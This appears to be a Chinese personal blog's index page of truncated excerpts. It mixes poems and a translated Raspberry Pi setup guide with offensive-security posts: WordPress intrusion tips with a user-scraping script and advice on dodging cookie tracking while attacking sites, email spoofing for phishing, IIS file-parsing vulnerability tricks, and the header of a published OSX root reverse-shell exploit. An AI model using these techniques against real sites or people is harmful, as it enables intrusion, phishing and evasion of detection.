《未来》

   (图为夕阳下的城门)   《未来》   在我们的宇宙中, 未来受一系列随机事件影响。   而在哲学层面, 认为你的思想决定你的未来。   若你的思想阳光明媚,

WordPress博客入侵技巧交流

先贴下我的抓取wordpress 用户脚本 import java.io.BufferedReader; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.InputStreamReader; import java.net.URL; /** * WordpressGetUser * Group 类 用于匹配和抓取 html页面的数据 * @author itleaf - http://blog.itleaf.info */ public class wpUserCollection { public static void main(String[] args) {

注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪

追踪代码 <html> <head> <title>test</title> </head> <body> <strong>It works</strong> <script type="text/javascript"> var pid = 20130906003345; var random = 60113; function GetObjString(obj) { if (typeof(obj) != 'object') { return obj; } var retstr = '{ '; for (fld in obj) { retstr += '{ ' + fld + '=' + GetObjString(obj[fld]) + " }\n"; } retstr += ' }'; return retstr; } function ProcessDataInner(obj, subject) { var objstr =

《如梦》

       如梦   我曾幻想,有根魔杖; 轻轻一挥,愿望成真。   我曾渴望,拥有魔法; 指尖漫舞,梦想实现。   What's your Wish?   小提示: 欢迎与核总吟诗作对,今后将分享

邮箱伪造详解

0x00 背景 邮箱伪造技术,可被用来做钓鱼攻击。 即伪造管理员或者IT运维部等邮箱发邮件,获取信任使对方打开附带的木马文件或者回复想要获取的敏感资料等

解析漏洞总结

一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的

树莓派的基本配置 [手工翻译]

英文原文地址:Overview | Adafruit's Raspberry Pi Lesson 2. First Time Configuration | Adafruit Learning System 0x00概述 In the first lesson of this series, we showed you how to prepare an SD card containing an operating system for your Raspberry Pi. In this lesson, we will show you how to setup your Raspberry

OSX <= 10.8.4 - Local Root Priv Escalation (py)

#!/usr/bin/python # Original MSF Module: # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb ################################################################################################### # Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell # Date: 08-27-2013 # Exploit Author: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # Tested On: OSX 10.8.4 # # Reference: http://www.exploit-db.com/exploits/27944/ # # Example below: # trustedsec:Desktop Dave$ python osx_esc.py # [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and